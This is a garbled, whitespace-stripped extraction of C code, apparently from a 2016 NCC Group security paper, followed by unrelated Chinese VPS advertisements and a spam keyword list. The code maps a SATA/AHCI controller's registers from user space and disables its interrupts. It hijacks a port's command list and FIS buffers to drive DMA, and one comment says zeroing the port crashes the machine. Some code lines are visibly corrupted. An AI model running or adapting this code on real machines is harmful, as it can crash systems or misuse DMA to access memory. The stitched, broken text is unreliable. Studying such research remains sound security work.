md&PORT_CMD_ASP)printf("\tPORT_CMD_ASP\n");}voidprint_ahci_port(hba_port_t*p){printf("commandlistbaseaddress:0x%x\n",p->clb);printf("FISbaseaddress:0x%x\n",p->fb);printf("interruptstatus:0x%x\n",p->is);print_interrupt_bits(p->is);NCCGroup|Page45Copyright2016NCCGroupprintf("interruptenable:0x%x\n",p->ie);print_interrupt_bits(p->ie);printf("commandandstatus:0x%x\n",p->cmd);print_command_bits(p->cmd);printf("signature:0x%x",p->sig);if(p->sig==SATA_SIG_ATA){printf("(SATAdrive)\n");}else{putchar('\n');}printf("tfd:0x%x\n",p->tfd);printf("status:0x%x\n",p->ssts);printf("errors:0x%x\n",p->serr);printf("active:0x%x\n",p->sact);printf("control:0x%x\n",p->sctl);}voidstart_cmd(hba_port_t*p){printf("WaitingforPORT_CMD_START\n");while(p->cmd&PORT_CMD_START);printf("PORT_CMD_STARTisoff\n");p->cmd|=PORT_CMD_FIS_RX;p->cmd|=PORT_CMD_START;printf("Startedcmdengine\n");}voidstop_cmd(hba_port_t*p){intcmd;printf("Before:\n");print_command_bits(p->cmd);p->cmd&=~PORT_CMD_START;cmd=p->cmd;//flushprintf("WaitingforPORT_CMD_FIS_ONandPORT_CMD_LIST_ON\n");//TheseneverseemstoactuallyshutoffwhenyouunsettheCMD_STARTbit//despitewhattheosdevwikisaysnotsurewhatiswrongwhile(0){//XXXwhile(1)if(p->cmd&PORT_CMD_FIS_ON)continue;if(p->cmd&PORT_CMD_LIST_ON)NCCGroup|Page46Copyright2016NCCGroupcontinue;break;}p->cmd&=~PORT_CMD_FIS_RX;cmd=p->cmd;//flushprintf("Stoppedcmdengine\n");printf("After:\n");print_command_bits(p->cmd);}/*XXX-Thisshouldusetheports_implmembertoactuallyfindthefirstoneinstead*/int32_tfind_inuse_port(ahci_host_t*p){int32_tport;int32_tport_count;hba_port_t*hbap;port_count=(p->cap&0x1f)+1;printf("p->ports_impl:0x%x\n",p->ports_impl);for(port=0;portie!
=0){printf(port%dn",port);print_ahci_port(hbap);printf(n");returnport;}}return-1;}/*ForlargerdatatransferswewouldhaveissueherewithforcingadjacentphysicalpagesneededfordmaIfyoudoone512sectoratatimeitmightbeokaythough*/char*alloc_phy(uint32_tlen,uint64_t*phy){char*vaddr;staticint32_tpmap=0;if(len>PAGE_SIZE){NCCGroup|Page47Copyright2016NCCGroupprintf("[!
]Warning.
Physicalallocationofsize0x%xmightnotbecontiguous\n",len);}vaddr=mmap(NULL,len,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);if((int64_t)vaddr==-1){perror("mmap");exit(EXIT_FAILURE);}//Touchittobesureit'sactuallymappedmemset(vaddr,0,len);//Lockittoensureitdoesntgetswappedduringdmaorsomethingmlock(vaddr,len);if(!
pmap){pmap=open_pmap();}*phy=vaddr_to_paddr(pmap,(uint64_t)vaddr);returnvaddr;}voiddisable_interrupts(ahci_host_t*p){uint32_tctl;ctl&=~HOST_IRQ_EN;p->ctl=ctl;ctl=p->ctl;//flushif(ctl&HOST_IRQ_EN){printf("IRQsdidnotdisable!
Somethingisbroken\n");exit(EXIT_FAILURE);}else{printf("IRQsdisabled\n");}}voidenable_interrupts(ahci_host_t*p){uint32_tctl;ctl=p->ctl|HOST_IRQ_EN;p->ctl=ctl;ctl=p->ctl;//flushif(ctl&HOST_IRQ_EN){NCCGroup|Page48Copyright2016NCCGroupprintf("IRQsenabled\n");}else{printf("IRQscouldn'tenabled!
Somethingisbroken\n");exit(EXIT_FAILURE);}}int32_tmain(int32_targc,char**argv){uint32_tc;charpath[PATH_MAX];int32_tfd;char*bus;char*device;char*function;uint32_tsbus,sdevfn,svend;unsignedlongbar,sbar=0;uint32_ttotal_read_size;ahci_host_t*p;char*ptr;char*dma;//datasentandrecievedviascatter/gatheruint64_tdma_phy;char*cmd_list;//newaddressofcommandlistuint64_tcmd_list_phy;char*cmd;//addressofcommandtableuint64_tcmd_phy;char*fis_buf;//addresstoreceiveFISresponsesuint64_tfis_buf_phy;unsignedintnum_pages;uint32_torig_cmd_list;uint32_torig_cmd_listu;uint32_torig_fis;uint32_torig_fisu;structhost_to_dev_fisfis;structdma_setup_fissetup_fis;structcmd_hdr*cmd_hdr;structcmd_sg*cmd_sg;int32_tfis_len;int32_tbuf_len;int32_ttmp;int32_ti;int32_tcomplete;int32_tdone;NCCGroup|Page49Copyright2016NCCGroupcharlast_fis_page[PAGE_SIZE];charlast_cmd_page[PAGE_SIZE];bus=device=function=NULL;num_pages=bar=sbus=sdevfn=0;while((c=getopt(argc,argv,"b:d:f:a:p:h"))!
=-1){switch(c){case'b':bus=optarg;break;case'd':device=optarg;break;case'f':function=optarg;break;case'a':bar=strtoul(optarg,NULL,16);break;case'p':num_pages=atoi(optarg);break;case'h':default:usage(argv[0]);exit(EXIT_SUCCESS);}}if(!
bus||!
device||!
function||!
num_pages||!
bar){printf("Mustsupplybusslotfunctionbar(hex)num_pages(dec)\n");usage(argv[0]);exit(EXIT_FAILURE);}total_read_size=getpagesize()*num_pages;printf("bar:%lxbus:%sdevice:%sfunction:%s\n",bar,bus,device,function);sprintf(path,"/proc/bus/pci/%s/%s.
%s",bus,device,function);fd=open(path,O_RDWR);if(fd==-1){printf("Failedtoopen:%s\n",path);perror("open");exit(1);}NCCGroup|Page50Copyright2016NCCGroupprintf("opened%s\n",path);printf("mapping%dpagesofsize:%d\n",num_pages,getpagesize());ioctl(fd,PCIIOC_MMAP_IS_MEM);ptr=mmap(NULL,total_read_size,PROT_READ|PROT_WRITE,MAP_SHARED,fd,(off_t)bar);if(ptr==MAP_FAILED){perror("mmapfailed!
");exit(1);}print_ahci_info((ahci_host_t*)ptr);p=(ahci_host_t*)ptr;//Disableinterruptsforthisdevicesothekerneldoesn'tgetinvolved.
//Thisobviouslybreaksifit'sthemaindisk,sinceitwillstop//working.
.
.
disable_interrupts(p);if(p->cap&HOST_CAP_64){printf("Supports64-bitaddresses\n");}/*ThismeanstheFISDMAsetupfunctionalityishiddenbytheAHCI*controlleritself,anditwillcopytoourbuffers,specifiedviaSGin*otherFISdirectly*/if(p->cap&HOST_CAP_NCQ){printf("Supportsnativecommandqueuing\n");}//ThiswouldinfluenceourCFISconstructionlaterif(p->cap&HOST_CAP_PMP){printf("Supportsportmultiplier\n");}//shouldstaybelow1pagetoensurememorycontiguitydma=alloc_phy(PAGE_SIZE,&dma_phy);cmd_list=alloc_phy(PAGE_SIZE,&cmd_list_phy);fis_buf=alloc_phy(PAGE_SIZE,&fis_buf_phy);cmd=alloc_phy(PAGE_SIZE,&cmd_phy);printf("DMAbuffer@0x%lx\n",(uint64_t)dma_phy);printf("cmdlistbuffer@0x%lx\n",(uint64_t)cmd_list_phy);printf("FISbuffer@0x%lx\n",(uint64_t)fis_buf_phy);printf("cmdbuffer@0x%lx\n",(uint64_t)cmd_phy);memcpy(last_fis_page,fis_buf,PAGE_SIZE);NCCGroup|Page51Copyright2016NCCGroupint32_ttport=find_inuse_port(p);hba_port_t*hbap;hbap=ahci_port_entry((char*)p,tport);//ifyouwanttojustcrashamachineyoucanzeroouteverything//memset(hbap,0,sizeof(hba_port_t));orig_fis=hbap->fb;orig_fisu=hbap->fbu;orig_cmd_list=hbap->clb;orig_cmd_list=hbap->clbu;//XXX-stoppinglikethisdoesn'tseemtoactuallywork//stop_cmd(hbap);hbap->fb=(uint64_t)fis_buf_phy&0xfffffffff;hbap->fbu=0;hbap->clb=(uint64_t)cmd_list_phy&0xfffffffff;hbap->clbu=0;//start_cmd(hbap);memset(&fis,0,sizeof(fis));memset(&setup_fis,0,sizeof(setup_fis));//buildH2Dfisfis.
type=FIS_TYPE_REG_H2D;fis.
opts=1>8)&0xff;fis.
lba_mid=(dma_phy>>16)&0xff;fis.
lba_hi=(dma_phy>>24)&0xff;fis.
sect_count=1;fis_len=5;buf_len=sizeof(uint16_t)*ATA_ID_WORDS;memcpy(cmd,&fis,fis_len*4);cmd_hdr=(structcmd_hdr*)cmd_list;cmd_hdr->ctba=(cmd_phy&0xffffffff);cmd_hdr->ctbau=((cmd_phy>>16)>>16);//Theseassumeweareusingthefirstslotcmd_sg=(structcmd_sg*)(cmd+AHCI_CMD_TBL_HDR_SZ);cmd_sg->info=(buf_len-1)&0x3fffff;cmd_sg->dba=dma_phy&0xFFFFFFFF;cmd_sg->dba_upper=((dma_phy>>16)>>16);NCCGroup|Page52Copyright2016NCCGroup//1opts|=fis_len|(1is);printf("startbitbefore:%d\n",hbap->cmd&1);tmp=hbap->cmd;hbap->cmd|=tmp|1;//hbap->sact=1;//requiredwhenissuingNCQcommandhbap->ci=1;//slot0XXX-needstobedynamicifdifferentslot//inusememcpy(last_cmd_page,cmd_list,PAGE_SIZE);sleep(1);complete=0;printf("interruptstatusafter:0x%x\n",hbap->is);print_interrupt_bits(hbap->is);//Waitforsomethingtouseourphysicaladdressprintf("Waitingforcommandcompletion\n");done=0;while(!
done){if((hbap->ci&1)==0&&!
complete){printf("Seemstohavecompleted.
.
.
\n");complete=1;}elseif(!
complete){printf("wasn'tcomplete\n");}if((hbap->is&PORT_IRQ_TF_ERR)){print_interrupt_bits(hbap->is);print_ahci_port(hbap);printf("Taskfileerror\n");printf("tfd:0x%x\n",hbap->tfd);printf("DIAGerror\n");printf("diag:0x%x\n",hbap->serr);hexdump(dma,256);break;}sleep(1);for(i=0;ifb=orig_fis;hbap->fbu=orig_fisu;hbap->clb=orig_cmd_list;hbap->clbu=orig_cmd_listu;enable_interrupts(p);munmap(dma,PAGE_SIZE);munmap(cmd_list,PAGE_SIZE);munmap(cmd,PAGE_SIZE);munmap(fis_buf,PAGE_SIZE);munmap(ptr,total_read_size);close(fd);return0;}
搬瓦工怎么样?2021年7月最新vps套餐推荐及搬瓦工优惠码整理,搬瓦工优惠码可以在购买的时候获取一些优惠,一般来说力度都在 6% 左右。本文整理一下 2021 年 7 月最新的搬瓦工优惠码,目前折扣力度最大是 6.58%,并且是循环折扣,续费有效,可以一直享受优惠价格续费的。搬瓦工优惠码基本上可能每年才会更新一次,大家可以收藏本文,会保持搬瓦工最新优惠码更新的。点击进入:搬瓦工最新官方网站搬瓦工...
sharktech怎么样?sharktech (鲨鱼机房)是一家成立于 2003 年的知名美国老牌主机商,又称鲨鱼机房或者SK 机房,一直主打高防系列产品,提供独立服务器租用业务和 VPS 主机,自营机房在美国洛杉矶、丹佛、芝加哥和荷兰阿姆斯特丹,所有产品均提供 DDoS 防护。此文只整理他们家10Gbps专用服务器,此外该系列所有服务器都受到高达 60Gbps(可升级到 100Gbps)的保护。...
CloudCone 商家在以前的篇幅中也有多次介绍到,这个商家也蛮有意思的。以前一直只有洛杉矶MC机房,而且在功能上和Linode、DO、Vultr一样可以随时删除采用按时计费模式。但是,他们没有学到人家的精华部分,要这样的小时计费,一定要机房多才有优势,否则压根没有多大用途。这不最近CloudCone商家有点小变化,有新人洛杉矶优化线路,具体是什么优化的等会我测试看看线路。内存CPU硬盘流量价格...
ubuntutweak为你推荐
ip购买不同的ID不同的IP买同一个店铺同样的商品属于虚假交易吗?permissiondeniedpermission denied是什么意思啊?巨星prince去世作者为什么把伏尔泰的逝世说成是巨星陨落巨星prince去世Whitney Houston因什么去世的?刘祚天Mc浩然的资料以及百科谁知道?原代码什么叫源代码,源代码有什么作用psbc.com怎样登录wap.psbc.com百花百游百花净斑方多少钱一盒网站检测请问,对网站进行监控检测的工具有哪些?haokandianyingwang有什么好看的电影网站
广东虚拟主机 域名主机管理系统 华为云服务 linode 英文简历模板word php免费空间 阿里云浏览器 微信收钱 腾讯云分析 赞助 cdn加速原理 国外免费asp空间 太原联通测速 贵阳电信测速 阿里云手机官网 免费个人网页 网站加速 好看的空间 开心online 上海联通 更多